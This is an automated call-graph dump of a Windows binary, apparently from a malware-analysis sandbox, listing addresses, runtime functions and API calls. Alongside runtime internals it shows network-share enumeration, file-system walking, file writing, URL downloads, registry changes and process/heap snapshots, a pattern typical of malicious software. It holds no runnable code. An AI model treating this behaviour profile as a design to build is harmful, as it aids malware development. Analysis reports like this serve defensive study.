43bcf1 44067->44068 44069 43bcce 44067->44069 44143 43b88d 44068->44143 44153 4251d4 58 API calls __getptd_noexit 44069->44153 44072 43bcd3 44073 425208 __setmbcp 58 API calls 44072->44073 44075 43bcdd 44073->44075 44074 43bd91 GetFileType 44076 43bdde 44074->44076 44077 43bd9c GetLastError 44074->44077 44081 425208 __setmbcp 58 API calls 44075->44081 44156 43b56e 59 API calls 2 library calls 44076->44156 44155 4251e7 58 API calls 3 library calls 44077->44155 44078 43bd5f GetLastError 44154 4251e7 58 API calls 3 library calls 44078->44154 44081->44060 44083 43b88d ___createFile 3 API calls 44086 43bd54 44083->44086 44084 43bd84 44089 425208 __setmbcp 58 API calls 44084->44089 44085 43bdc3 CloseHandle 44085->44084 44088 43bdd1 44085->44088 44086->44074 44086->44078 44090 425208 __setmbcp 58 API calls 44088->44090 44089->44047 44091 43bdd6 44090->44091 44091->44084 44092 43bdfc 44093 43bfb7 44092->44093 44113 43be7d 44092->44113 44157 42f744 60 API calls 3 library calls 44092->44157 44093->44047 44095 43c18a CloseHandle 44093->44095 44097 43b88d ___createFile 3 API calls 44095->44097 44096 43be66 44096->44113 44158 4251d4 58 API calls __getptd_noexit 44096->44158 44099 43c1b1 44097->44099 44098 42b5c4 70 API calls __read_nolock 44098->44113 44101 43c1b9 GetLastError 44099->44101 44108 43c041 44099->44108 44162 4251e7 58 API calls 3 library calls 44101->44162 44103 43be85 44103->44113 44159 430b25 61 API calls 3 library calls 44103->44159 44160 447cac 82 API calls 6 library calls 44103->44160 44105 43c1c5 44163 43b36b 59 API calls 2 library calls 44105->44163 44108->44047 44109 42df14 __write 78 API calls 44109->44113 44110 43c034 44161 430b25 61 API calls 3 library calls 44110->44161 44112 43c03b 44114 425208 __setmbcp 58 API calls 44112->44114 44113->44093 44113->44098 44113->44103 44113->44109 44113->44110 44115 42f744 60 API calls __lseeki64_nolock 44113->44115 44114->44108 44115->44113 44116->44043 44117->44043 44119 447f6f 44118->44119 44120 447f5a 44118->44120 44119->44049 44121 425208 __setmbcp 58 API calls 44120->44121 44122 447f5f 44121->44122 44165 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44122->44165 44124 447f6a 44124->44049 44126 43b1ce __setmbcp 44125->44126 44127 428b9f __mtinitlocknum 58 API calls 44126->44127 44128 43b1df 44127->44128 44129 428af7 __lock 58 API calls 44128->44129 44130 43b1e4 __setmbcp 44128->44130 44139 43b1f2 44129->44139 44130->44067 44131 43b340 44168 43b362 LeaveCriticalSection _doexit 44131->44168 44133 43b2d2 44134 428c96 __calloc_crt 58 API calls 44133->44134 44137 43b2db 44134->44137 44135 428af7 __lock 58 API calls 44135->44139 44136 43b272 EnterCriticalSection 44138 43b282 LeaveCriticalSection 44136->44138 44136->44139 44137->44131 44140 43b134 ___lock_fhandle 59 API calls 44137->44140 44138->44139 44139->44131 44139->44133 44139->44135 44139->44136 44166 43263e InitializeCriticalSectionAndSpinCount 44139->44166 44167 43b29a LeaveCriticalSection _doexit 44139->44167 44140->44131 44144 43b898 ___crtIsPackagedApp 44143->44144 44145 43b8f3 CreateFileW 44144->44145 44146 43b89c GetModuleHandleW GetProcAddress 44144->44146 44148 43b911 44145->44148 44147 43b8b9 44146->44147 44147->44148 44148->44074 44148->44078 44148->44083 44149->44053 44150->44060 44151->44061 44152->44047 44153->44072 44154->44084 44155->44085 44156->44092 44157->44096 44158->44113 44159->44103 44160->44103 44161->44112 44162->44105 44163->44108 44164->44050 44165->44124 44166->44139 44167->44139 44168->44130 44169->43938 44171 420e63 44170->44171 44172 420e85 EnterCriticalSection 44170->44172 44171->44172 44173 420e6b 44171->44173 44174 420e7b 44172->44174 44175 428af7 __lock 58 API calls 44173->44175 44174->43951 44175->44174 44177 4294a3 44176->44177 44178 42932b 44176->44178 44214 42938a 44177->44214 44240 43c784 72 API calls 5 library calls 44177->44240 44179 42816b __filbuf 58 API calls 44178->44179 44181 429331 44179->44181 44182 42816b __filbuf 58 API calls 44181->44182 44196 429354 44181->44196 44183 42933d 44182->44183 44186 42816b __filbuf 58 API calls 44183->44186 44183->44196 44184 4293c0 44184->44177 44187 42816b __filbuf 58 API calls 44184->44187 44185 42936d 44188 42b2f2 __filbuf 72 API calls 44185->44188 44189 429372 44185->44189 44190 429349 44186->44190 44191 4293d0 44187->44191 44188->44189 44194 42b2f2 __filbuf 72 API calls 44189->44194 44189->44214 44192 42816b __filbuf 58 API calls 44190->44192 44193 4293f3 44191->44193 44197 42816b __filbuf 58 API calls 44191->44197 44192->44196 44193->44177 44195 42940e 44193->44195 44194->44214 44198 429416 44195->44198 44217 42b2f2 44195->44217 44196->44184 44196->44185 44199 4293dc 44197->44199 44198->44214 44237 422d33 58 API calls __isleadbyte_l 44198->44237 44199->44193 44201 42816b __filbuf 58 API calls 44199->44201 44202 4293e8 44201->44202 44204 42816b __filbuf 58 API calls 44202->44204 44204->44193 44205 42943e 44206 429473 44205->44206 44207 429448 44205->44207 44209 42b2f2 __filbuf 72 API calls 44205->44209 44239 43c76c 60 API calls __woutput_s_l 44206->44239 44207->44206 44211 429460 44207->44211 44209->44207 44210 429487 44213 425208 __setmbcp 58 API calls 44210->44213 44210->44214 44238 43c607 60 API calls 5 library calls 44211->44238 44213->44214 44214->43951 44215->43948 44216->43948 44218 42b2fd 44217->44218 44222 42b312 44217->44222 44219 425208 __setmbcp 58 API calls 44218->44219 44220 42b302 44219->44220 44274 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44220->44274 44223 42b347 44222->44223 44230 42b30d 44222->44230 44275 438a16 58 API calls __malloc_crt 44222->44275 44225 42816b __filbuf 58 API calls 44223->44225 44226 42b35b 44225->44226 44241 42b4b0 44226->44241 44228 42b362 44229 42816b __filbuf 58 API calls 44228->44229 44228->44230 44231 42b385 44229->44231 44230->44198 44231->44230 44232 42816b __filbuf 58 API calls 44231->44232 44233 42b391 44232->44233 44233->44230 44234 42816b __filbuf 58 API calls 44233->44234 44235 42b39e 44234->44235 44236 42816b __filbuf 58 API calls 44235->44236 44236->44230 44237->44205 44238->44214 44239->44210 44240->44214 44242 42b4bc __setmbcp 44241->44242 44243 42b4e0 44242->44243 44244 42b4c9 44242->44244 44246 42b5a4 44243->44246 44249 42b4f4 44243->44249 44344 4251d4 58 API calls __getptd_noexit 44244->44344 44349 4251d4 58 API calls __getptd_noexit 44246->44349 44248 42b4ce 44251 425208 __setmbcp 58 API calls 44248->44251 44252 42b512 44249->44252 44253 42b51f 44249->44253 44250 42b517 44258 425208 __setmbcp 58 API calls 44250->44258 44265 42b4d5 __setmbcp 44251->44265 44345 4251d4 58 API calls __getptd_noexit 44252->44345 44255 42b541 44253->44255 44256 42b52c 44253->44256 44257 43b134 ___lock_fhandle 59 API calls 44255->44257 44346 4251d4 58 API calls __getptd_noexit 44256->44346 44260 42b547 44257->44260 44261 42b539 44258->44261 44263 42b55a 44260->44263 44264 42b56d 44260->44264 44350 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44261->44350 44262 42b531 44266 425208 __setmbcp 58 API calls 44262->44266 44276 42b5c4 44263->44276 44269 425208 __setmbcp 58 API calls 44264->44269 44265->44228 44266->44261 44271 42b572 44269->44271 44270 42b566 44348 42b59c LeaveCriticalSection __unlock_fhandle 44270->44348 44347 4251d4 58 API calls __getptd_noexit 44271->44347 44274->44230 44275->44223 44277 42b5e5 44276->44277 44278 42b5fc 44276->44278 44351 4251d4 58 API calls __getptd_noexit 44277->44351 44280 42bd34 44278->44280 44285 42b636 44278->44285 44363 4251d4 58 API calls __getptd_noexit 44280->44363 44282 42b5ea 44284 425208 __setmbcp 58 API calls 44282->44284 44283 42bd39 44286 425208 __setmbcp 58 API calls 44283->44286 44324 42b5f1 44284->44324 44287 42b63e 44285->44287 44292 42b655 44285->44292 44289 42b64a 44286->44289 44352 4251d4 58 API calls __getptd_noexit 44287->44352 44364 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44289->44364 44290 42b643 44294 425208 __setmbcp 58 API calls 44290->44294 44293 42b66a 44292->44293 44296 42b684 44292->44296 44297 42b6a2 44292->44297 44292->44324 44353 4251d4 58 API calls __getptd_noexit 44293->44353 44294->44289 44296->44293 44299 42b68f 44296->44299 44354 428cde 58 API calls 2 library calls 44297->44354 44301 4389c2 __flswbuf 58 API calls 44299->44301 44300 42b6b2 44302 42b6d5 44300->44302 44303 42b6ba 44300->44303 44304 42b7a3 44301->44304 44356 42f744 60 API calls 3 library calls 44302->44356 44305 425208 __setmbcp 58 API calls 44303->44305 44306 42b81c ReadFile 44304->44306 44311 42b7b9 GetConsoleMode 44304->44311 44308 42b6bf 44305->44308 44309 42b83e 44306->44309 44310 42bcfc GetLastError 44306->44310 44355 4251d4 58 API calls __getptd_noexit 44308->44355 44309->44310 44317 42b80e 44309->44317 44313 42b7fc 44310->44313 44314 42bd09 44310->44314 44315 42b819 44311->44315 44316 42b7cd 44311->44316 44325 42b802 44313->44325 44357 4251e7 58 API calls 3 library calls 44313->44357 44318 425208 __setmbcp 58 API calls 44314->44318 44315->44306 44316->44315 44319 42b7d3 ReadConsoleW 44316->44319 44317->44325 44327 42bae0 44317->44327 44329 42b873 44317->44329 44321 42bd0e 44318->44321 44319->44317 44322 42b7f6 GetLastError 44319->44322 44362 4251d4 58 API calls __getptd_noexit 44321->44362 44322->44313 44324->44270 44325->44324 44360 420bed 58 API calls 2 library calls 44325->44360 44327->44325 44332 42bbe6 ReadFile 44327->44332 44328 42b960 44328->44325 44334 42ba1d 44328->44334 44335 42ba0d 44328->44335 44338 42b9cd MultiByteToWideChar 44328->44338 44329->44328 44331 42b8df ReadFile 44329->44331 44333 42b900 GetLastError 44331->44333 44340 42b90a 44331->44340 44336 42bc09 GetLastError 44332->44336 44343 42bc17 44332->44343 44333->44340 44334->44338 44359 42f744 60 API calls 3 library calls 44334->44359 44337 425208 __setmbcp 58 API calls 44335->44337 44336->44343 44337->44325 44338->44322 44338->44325 44340->44329 44358 42f744 60 API calls 3 library calls 44340->44358 44343->44327 44361 42f744 60 API calls 3 library calls 44343->44361 44344->44248 44345->44250 44346->44262 44347->44270 44348->44265 44349->44250 44350->44265 44351->44282 44352->44290 44353->44290 44354->44300 44355->44324 44356->44299 44357->44325 44358->44340 44359->44338 44360->44324 44361->44343 44362->44325 44363->44283 44364->44324 44366 4239db 44365->44366 44367 4239ef 44365->44367 44368 425208 __setmbcp 58 API calls 44366->44368 44369 42836b __flush 78 API calls 44367->44369 44379 4239eb 44367->44379 44370 4239e0 44368->44370 44372 4239fb 44369->44372 44383 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44370->44383 44384 430bbf 58 API calls _free 44372->44384 44374 423a03 44375 42816b __filbuf 58 API calls 44374->44375 44376 423a09 44375->44376 44385 430a4a 63 API calls 6 library calls 44376->44385 44378 423a0f 44378->44379 44386 420bed 58 API calls 2 library calls 44378->44386 44382 423aa7 LeaveCriticalSection LeaveCriticalSection _ungetc 44379->44382 44381->43961 44382->43961 44383->44379 44384->44374 44385->44378 44386->44379 44388 415ab8 44387->44388 44389 4159e8 44387->44389 44466 44f26c 59 API calls 3 library calls 44388->44466 44391 415ac2 44389->44391 44392 415a02 44389->44392 44467 44f23e 59 API calls 2 library calls 44391->44467 44394 415acc 44392->44394 44395 415a1a 44392->44395 44398 415a2a ___crtGetEnvironmentStringsW 44392->44398 44468 44f23e 59 API calls 2 library calls 44394->44468 44397 416950 59 API calls 44395->44397 44395->44398 44397->44398 44398->43437 44466->44391 44599 423f74 44556->44599 44559 41f196 Sleep 44560 41f1c1 44559->44560 44561 41f94b 44559->44561 44563 410a50 65 API calls 44560->44563 44562 414690 59 API calls 44561->44562 44564 41f97a 44562->44564 44573 41f1cd 44563->44573 44659 410160 89 API calls 5 library calls 44564->44659 44566 41f216 44567 415c10 59 API calls 44566->44567 44568 41f274 44567->44568 44602 40f730 44568->44602 44569 41f9c1 SendMessageW 44572 41f9e1 44569->44572 44595 41f8af 44569->44595 44571 420235 _TranslateName 60 API calls 44571->44573 44572->44595 44573->44566 44573->44571 44574 4111c0 170 API calls 44575 41f987 44574->44575 44575->44569 44575->44574 44576 411ab0 PeekMessageW DispatchMessageW PeekMessageW 44575->44576 44576->44575 44577 415c10 59 API calls 44580 41f281 44577->44580 44578 415c10 59 API calls 44581 41f392 44578->44581 44579 41f5bd PeekMessageW 44587 41f52c 44579->44587 44580->44577 44580->44581 44586 40f730 192 API calls 44580->44586 44581->44578 44582 40f730 192 API calls 44581->44582 44581->44587 44582->44581 44583 414690 59 API calls 44583->44587 44584 41f689 44585 415c10 59 API calls 44584->44585 44588 41f73e 44585->44588 44586->44580 44587->44579 44587->44583 44587->44584 44589 41f5d6 DispatchMessageW PeekMessageW 44587->44589 44591 40f730 192 API calls 44587->44591 44590 40f730 192 API calls 44588->44590 44589->44587 44597 41f74b 44590->44597 44591->44587 44592 41f893 SendMessageW 44592->44595 44593 41f7cf PeekMessageW 44593->44597 44594 414690 59 API calls 44594->44597 44596 41f7e7 DispatchMessageW PeekMessageW 44596->44597 44597->44592 44597->44593 44597->44594 44597->44596 44598 40f730 192 API calls 44597->44598 44598->44597 44600 425007 __setmbcp 58 API calls 44599->44600 44601 41f16a Sleep 44600->44601 44601->44559 44601->44595 44603 411ab0 3 API calls 44602->44603 44612 40f765 44603->44612 44604 40f8b5 44605 414690 59 API calls 44604->44605 44606 40f8ea PathFindFileNameW 44605->44606 44608 40f923 44606->44608 44607 414690 59 API calls 44607->44612 44608->44608 44609 415c10 59 API calls 44608->44609 44610 40f98c 44609->44610 44611 413520 59 API calls 44610->44611 44630 40f9a8 _memmove 44611->44630 44612->44604 44612->44607 44613 415ae0 59 API calls 44612->44613 44614 420235 _TranslateName 60 API calls 44612->44614 44629 40f927 44612->44629 44613->44612 44614->44612 44615 40fa44 PathFindFileNameW 44615->44630 44616 40fb28 44617 40fcdc 44616->44617 44620 414690 59 API calls 44616->44620 44700 417140 44617->44700 44618 415c10 59 API calls 44618->44630 44622 40fb55 44620->44622 44660 40f310 LoadLibraryW 44622->44660 44623 413520 59 API calls 44623->44630 44626 40fb5a 44626->44617 44627 414690 59 API calls 44626->44627 44628 40fb75 44627->44628 44631 413a90 59 API calls 44628->44631 44629->44580 44630->44615 44630->44616 44630->44618 44630->44623 44632 40fb86 PathAppendW 44631->44632 44636 418400 59 API calls 44632->44636 44633 410052 FindNextFileW 44635 41006b FindClose 44633->44635 44657 40fd22 _wcsstr 44633->44657 44635->44629 44638 40fbfe _memmove 44636->44638 44637 40fc4f PathFileExistsW 44637->44617 44640 40fc6d 44637->44640 44638->44637 44639 417140 59 API calls 44639->44657 44643 420c62 _malloc 58 API calls 44640->44643 44641 411ab0 3 API calls 44641->44657 44642 415ae0 59 API calls 44642->44657 44645 40fc77 lstrcpyW 44643->44645 44644 414690 59 API calls 44644->44657 44647 40fca1 44645->44647 44648 40fca3 lstrcatW 44645->44648 44647->44648 44650 414690 59 API calls 44648->44650 44652 40fccf 44650->44652 44693 40f0e0 CreateFileW 44652->44693 44653 40ff41 PathFindExtensionW 44653->44657 44655 40fcd6 44723 420bed 58 API calls 2 library calls 44655->44723 44657->44629 44657->44633 44657->44639 44657->44641 44657->44642 44657->44644 44658 4111c0 170 API calls 44657->44658 44708 415ae0 44657->44708 44724 413b70 59 API calls 44657->44724 44658->44657 44659->44575 44661 40f34b GetProcAddress 44660->44661 44664 40f344 44660->44664 44662 413a90 59 API calls 44661->44662 44663 40f368 44662->44663 44665 418400 59 API calls 44663->44665 44664->44626 44666 40f39d 44665->44666 44667 415c10 59 API calls 44666->44667 44668 40f3c4 44667->44668 44669 415c10 59 API calls 44668->44669 44670 40f3eb 44669->44670 44725 40f2b0 59 API calls 44670->44725 44672 415c10 59 API calls 44674 40f45e 44672->44674 44673 40f3fe 44673->44672 44675 415c10 59 API calls 44674->44675 44676 40f485 44675->44676 44726 40f2b0 59 API calls 44676->44726 44678 40f498 44679 40f50a 44678->44679 44727 418380 65 API calls __forcdecpt_l 44678->44727 44681 40f542 44679->44681 44728 418380 65 API calls __forcdecpt_l 44679->44728 44683 40f560 FreeLibrary 44681->44683 44684 40f56e 44681->44684 44686 40f6c7 44683->44686 44685 413520 59 API calls 44684->44685 44687 40f57d 44685->44687 44686->44664 44689 413520 59 API calls 44687->44689 44691 40f5ed 44687->44691 44688 40f6a5 FreeLibrary 44688->44686 44689->44691 44690 413520 59 API calls 44692 40f65d 44690->44692 44691->44688 44691->44690 44692->44688 44694 40f136 44693->44694 44699 40f1b4 44693->44699 44695 415c10 59 API calls 44694->44695 44696 40f178 44695->44696 44697 412840 60 API calls 44696->44697 44698 40f183 lstrlenA WriteFile CloseHandle 44697->44698 44698->44699 44699->44655 44701 417197 44700->44701 44702 4171c8 44701->44702 44729 415d50 59 API calls ___crtGetEnvironmentStringsW 44701->44729 44703 4159d0 59 API calls 44702->44703 44705 4171ef 44703->44705 44706 415ae0 59 API calls 44705->44706 44707 40fd00 FindFirstFileW 44706->44707 44707->44657 44709 415b36 44708->44709 44716 415aee 44708->44716 44710 415bf1 44709->44710 44712 415b49 44709->44712 44730 44f23e 59 API calls 2 library calls 44710->44730 44713 415bfb 44712->44713 44714 415b61 44712->44714 44720 415b71 ___crtGetEnvironmentStringsW 44712->44720 44731 44f23e 59 API calls 2 library calls 44713->44731 44718 416950 59 API calls 44714->44718 44714->44720 44716->44709 44719 415b15 44716->44719 44718->44720 44721 4159d0 59 API calls 44719->44721 44720->44653 44722 415b30 44721->44722 44722->44653 44723->44617 44724->44657 44725->44673 44726->44678 44727->44679 44728->44681 44729->44702 44735 410bd0 WNetOpenEnumW 44732->44735 44734 41fd95 SendMessageW 44736 410c33 GlobalAlloc 44735->44736 44737 410c1c 44735->44737 44740 410c45 _memset 44736->44740 44737->44734 44738 410c51 WNetEnumResourceW 44739 410ea3 WNetCloseEnum 44738->44739 44738->44740 44739->44734 44740->44738 44740->44740 44741 4150c0 59 API calls 44740->44741 44742 415c10 59 API calls 44740->44742 44743 418fd0 59 API calls 44740->44743 44744 410bd0 59 API calls 44740->44744 44741->44740 44742->44740 44743->44740 44744->44740 44746 42f7c0 __write_nolock 44745->44746 44747 41e6b6 timeGetTime 44746->44747 44748 423f74 58 API calls 44747->44748 44749 41e6cc 44748->44749 44817 40c6a0 RegOpenKeyExW 44749->44817 44752 41e72e InternetOpenW 44800 41e6d4 _memset _strstr _wcsstr 44752->44800 44753 41ea8d lstrlenA lstrcpyA lstrcpyA lstrlenA 44753->44800 44754 41ea4c SHGetFolderPathA 44755 41ea67 PathAppendA DeleteFileA 44754->44755 44754->44800 44755->44800 44757 41eada lstrlenA 44757->44800 44758 4156d0 59 API calls 44758->44800 44759 414690 59 API calls 44772 41e7be _memmove 44759->44772 44760 41ee4d 44762 40ef50 58 API calls 44760->44762 44761 415ae0 59 API calls 44761->44800 44767 41ee5d 44762->44767 44763 413ff0 59 API calls 44763->44800 44764 412900 60 API calls 44764->44800 44766 41eb53 lstrcpyW 44768 41eb74 lstrlenA 44766->44768 44766->44800 44770 413ea0 59 API calls 44767->44770 44774 41eeb1 44767->44774 44771 420c62 _malloc 58 API calls 44768->44771 44769 4159d0 59 API calls 44769->44800 44770->44767 44771->44800 44772->44759 44772->44760 44772->44800 44858 40dd40 73 API calls 4 library calls 44772->44858 44860 420bed 58 API calls 2 library calls 44772->44860 44861 411b10 7 API calls 44772->44861 44773 41e8f3 lstrcpyW 44775 41e943 InternetOpenUrlW InternetReadFile 44773->44775 44773->44800 44776 40ef50 58 API calls 44774->44776 44778 41e9ec InternetCloseHandle InternetCloseHandle 44775->44778 44779 41e97c SHGetFolderPathA 44775->44779 44784 41eec1 44776->44784 44777 41eb99 MultiByteToWideChar lstrcpyW 44777->44800 44778->44800 44779->44778 44780 41e996 PathAppendA 44779->44780 44842 4220b6 44780->44842 44781 41ec3d lstrlenW lstrlenA lstrcpyA lstrcpyA lstrlenA 44781->44800 44783 41e93c lstrcatW 44783->44775 44784->44784 44787 413ea0 59 API calls 44784->44787 44791 41ef12 44784->44791 44785 41ebf0 SHGetFolderPathA 44786 41ec17 PathAppendA DeleteFileA 44785->44786 44785->44800 44786->44800 44787->44784 44788 41e9c4 lstrlenA 44845 422b02 44788->44845 44790 41ecaa lstrlenA 44790->44800 44792 413ff0 59 API calls 44791->44792 44794 41ef3a 44792->44794 44793 423a38 __fcloseall 83 API calls 44793->44800 44795 412900 60 API calls 44794->44795 44797 41ef45 lstrcpyW 44795->44797 44796 41ed1f lstrcpyW 44798 41ed43 lstrlenA 44796->44798 44796->44800 44802 41ef6a 44797->44802 44801 420c62 _malloc 58 API calls 44798->44801 44800->44752 44800->44753 44800->44754 44800->44757 44800->44758 44800->44761 44800->44763 44800->44764 44800->44766 44800->44768 44800->44769 44800->44772 44800->44773 44800->44775 44800->44777 44800->44778 44800->44781 44800->44783 44800->44785 44800->44788 44800->44790 44800->44793 44800->44796 44800->44798 44806 41ed68 MultiByteToWideChar lstrcpyW lstrlenW 44800->44806 44809 41edc3 SHGetFolderPathA 44800->44809 44822 40c500 SHGetFolderPathA 44800->44822 44859 420bed 58 API calls 2 library calls 44800->44859 44801->44800 44803 413ff0 59 API calls 44802->44803 44804 41ef9f 44803->44804 44805 412900 60 API calls 44804->44805 44807 41efac lstrcpyW 44805->44807 44806->44800 44808 41edad lstrlenW 44806->44808 44815 41efc8 44807->44815 44808->44800 44811 41ee44 44808->44811 44809->44800 44812 41edea PathAppendA DeleteFileA 44809->44812 44812->44800 44815->44811 44818 40c734 44817->44818 44819 40c6cc RegQueryValueExW 44817->44819 44818->44800 44820 40c70c RegSetValueExW RegCloseKey 44819->44820 44821 40c6fd RegCloseKey 44819->44821 44820->44818 44821->44800 44823 40c525 44822->44823 44824 40c52c PathAppendA 44822->44824 44823->44800 44825 4220b6 125 API calls 44824->44825 44826 40c550 44825->44826 44827 40c559 44826->44827 44862 42387f 85 API calls 5 library calls 44826->44862 44827->44800 44829 40c56c 44863 423455 69 API calls 4 library calls 44829->44863 44831 40c572 44864 420cf4 84 API calls 6 library calls 44831->44864 44833 40c57a 44834 40c5a5 44833->44834 44836 40c589 44833->44836 44835 423a38 __fcloseall 83 API calls 44834->44835 44837 40c5ab 44835->44837 44865 4222f5 74 API calls __fread_nolock 44836->44865 44837->44800 44839 40c593 44840 423a38 __fcloseall 83 API calls 44839->44840 44841 40c599 44840->44841 44841->44800 44866 421ff2 44842->44866 44844 4220c6 44844->44800 44846 422b0e __setmbcp 44845->44846 44847 422b44 44846->44847 44848 422b2c 44846->44848 44857 422b3c __setmbcp 44846->44857 44849 420e53 __lock_file 59 API calls 44847->44849 44850 425208 __setmbcp 58 API calls 44848->44850 44852 422b4a 44849->44852 44851 422b31 44850->44851 44959 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44851->44959 44960 4229a9 78 API calls 7 library calls 44852->44960 44855 422b5e 44961 422b7c LeaveCriticalSection LeaveCriticalSection _ungetc 44855->44961 44857->44800 44858->44772 44859->44772 44860->44772 44861->44772 44862->44829 44863->44831 44864->44833 44865->44839 44868 421ffe __setmbcp 44866->44868 44867 422010 44869 425208 __setmbcp 58 API calls 44867->44869 44868->44867 44870 42203d 44868->44870 44871 422015 44869->44871 44873 428df4 __getstream 61 API calls 44870->44873 44902 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44871->44902 44874 422042 44873->44874 44875 42204b 44874->44875 44876 422058 44874->44876 44877 425208 __setmbcp 58 API calls 44875->44877 44878 422081 44876->44878 44879 422061 44876->44879 44881 422020 @_EH4_CallFilterFunc@8 __setmbcp 44877->44881 44885 42b078 44878->44885 44882 425208 __setmbcp 58 API calls 44879->44882 44881->44844 44882->44881 44893 42b095 44885->44893 44886 42b0a9 44887 425208 __setmbcp 58 API calls 44886->44887 44888 42b0ae 44887->44888 44907 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44888->44907 44890 42b2ac 44904 43fba6 44890->44904 44891 42208c 44903 4220ae LeaveCriticalSection LeaveCriticalSection _ungetc 44891->44903 44893->44886 44901 42b250 44893->44901 44908 43fbc4 58 API calls __mbsnbcmp_l 44893->44908 44895 42b216 44895->44886 44909 43fcf3 65 API calls __mbsnbicmp_l 44895->44909 44897 42b249 44897->44901 44910 43fcf3 65 API calls __mbsnbicmp_l 44897->44910 44899 42b268 44899->44901 44911 43fcf3 65 API calls __mbsnbicmp_l 44899->44911 44901->44886 44901->44890 44902->44881 44903->44881 44912 43fa8f 44904->44912 44906 43fbbf 44906->44891 44907->44891 44908->44895 44909->44897 44910->44899 44911->44901 44914 43fa9b __setmbcp 44912->44914 44913 43fab1 44915 425208 __setmbcp 58 API calls 44913->44915 44914->44913 44916 43fae7 44914->44916 44917 43fab6 44915->44917 44923 43fb58 44916->44923 44930 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44917->44930 44922 43fac0 __setmbcp 44922->44906 44932 427970 44923->44932 44926 43fb03 44931 43fb2c LeaveCriticalSection __unlock_fhandle 44926->44931 44927 43bac1 __wsopen_nolock 109 API calls 44928 43fb92 44927->44928 44953 420bed 58 API calls 2 library calls 44928->44953 44930->44922 44931->44922 44933 427993 44932->44933 44934 42797d 44932->44934 44933->44934 44936 42799a ___crtIsPackagedApp 44933->44936 44935 425208 __setmbcp 58 API calls 44934->44935 44937 427982 44935->44937 44939 4279a3 AreFileApisANSI 44936->44939 44940 4279b0 MultiByteToWideChar 44936->44940 44954 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44937->44954 44939->44940 44941 4279ad 44939->44941 44942 4279ca GetLastError 44940->44942 44943 4279db 44940->44943 44941->44940 44955 4251e7 58 API calls 3 library calls 44942->44955 44956 428cde 58 API calls 2 library calls 44943->44956 44946 4279e3 44947 42798c 44946->44947 44948 4279ea MultiByteToWideChar 44946->44948 44947->44926 44947->44927 44948->44947 44949 427a00 GetLastError 44948->44949 44957 4251e7 58 API calls 3 library calls 44949->44957 44951 427a0c 44958 420bed 58 API calls 2 library calls 44951->44958 44953->44926 44954->44947 44955->44947 44956->44946 44957->44951 44958->44947 44959->44857 44960->44855 44961->44857 44962 481920 44963 42f7c0 __write_nolock 44962->44963 44964 481943 GetVersionExA LoadLibraryA LoadLibraryA LoadLibraryA 44963->44964 44965 481a0b 44964->44965 44966 4819e2 GetProcAddress GetProcAddress 44964->44966 44967 481aab 44965->44967 44970 481a1b NetStatisticsGet 44965->44970 44966->44965 44968 481acb 44967->44968 44969 481ac4 FreeLibrary 44967->44969 44971 481ad5 GetProcAddress GetProcAddress GetProcAddress 44968->44971 44997 481b0d __write_nolock 44968->44997 44969->44968 44972 481a69 NetStatisticsGet 44970->44972 44973 481a33 __write_nolock 44970->44973 44971->44997 44972->44967 44974 481a87 __write_nolock 44972->44974 44978 45d550 101 API calls 44973->44978 44980 45d550 101 API calls 44974->44980 44975 481bee 44976 481c1b 44975->44976 44977 481c14 FreeLibrary 44975->44977 44981 481c31 LoadLibraryA 44976->44981 44982 481c24 44976->44982 44977->44976 44979 481a5a 44978->44979 44979->44972 44980->44967 44983 481c4a GetProcAddress GetProcAddress GetProcAddress 44981->44983 44984 481d4b 44981->44984 45062 4549a0 13 API calls 4 library calls 44982->45062 44995 481c84 __write_nolock 44983->44995 45001 481cac __write_nolock 44983->45001 44986 481d59 12 API calls 44984->44986 44987 48223f 44984->44987 44989 481e5c 44986->44989 44990 482233 FreeLibrary 44986->44990 45050 482470 44987->45050 44988 481c29 44988->44981 44988->44984 44989->44990 45011 481ed9 CreateToolhelp32Snapshot 44989->45011 44990->44987 44993 481d3f FreeLibrary 44993->44984 44994 48225b __write_nolock 44996 45d550 101 API calls 44994->44996 44998 45d550 101 API calls 44995->44998 45000 482276 GetCurrentProcessId 44996->45000 44997->44975 45003 45d550 101 API calls 44997->45003 45007 481b7c __write_nolock 44997->45007 44998->45001 44999 481d03 __write_nolock 44999->44993 45004 45d550 101 API calls 44999->45004 45002 48228f __write_nolock 45000->45002 45001->44999 45006 45d550 101 API calls 45001->45006 45008 45d550 101 API calls 45002->45008 45003->45007 45005 481d3c 45004->45005 45005->44993 45006->44999 45007->44975 45009 45d550 101 API calls 45007->45009 45010 4822aa 45008->45010 45009->44975 45012 42a77e _GetLocaleNameFromDefault 6 API calls 45010->45012 45011->44990 45013 481ef0 45011->45013 45014 4822ca 45012->45014 45015 481f03 GetTickCount 45013->45015 45016 481f15 Heap32ListFirst 45013->45016 45015->45016 45017 482081 45016->45017 45022 481f28 __write_nolock 45016->45022 45018 48209d Process32First 45017->45018 45019 482095 GetTickCount 45017->45019 45020 48210a 45018->45020 45024 4820b4 __write_nolock 45018->45024 45019->45018 45021 482118 GetTickCount 45020->45021 45030 482120 __write_nolock 45020->45030 45021->45030 45022->45017 45029 48204e Heap32ListNext 45022->45029 45031 482066 GetTickCount 45022->45031 45034 45d550 101 API calls 45022->45034 45040 481ff1 GetTickCount 45022->45040 45044 45d550 45022->45044 45024->45020 45026 45d550 101 API calls 45024->45026 45035 4820fb GetTickCount 45024->45035 45025 481f56 Heap32First 45025->45022 45026->45024 45027 482196 45028 4821a4 GetTickCount 45027->45028 45041 4821ac __write_nolock 45027->45041 45028->45041 45029->45017 45029->45022 45030->45027 45033 45d550 101 API calls 45030->45033 45042 482187 GetTickCount 45030->45042 45031->45017 45031->45022 45032 482219 45037 482229 45032->45037 45038 48222d CloseHandle 45032->45038 45033->45030 45036 481fd9 Heap32Next 45034->45036 45035->45020 45035->45024 45036->45022 45037->44990 45038->44990 45039 45d550 101 API calls 45039->45041 45040->45022 45041->45032 45041->45039 45043 48220a GetTickCount 45041->45043 45042->45027 45042->45030 45043->45032 45043->45041 45045 45d559 45044->45045 45047 45d57d __write_nolock 45044->45047 45063 46b5d0 101 API calls 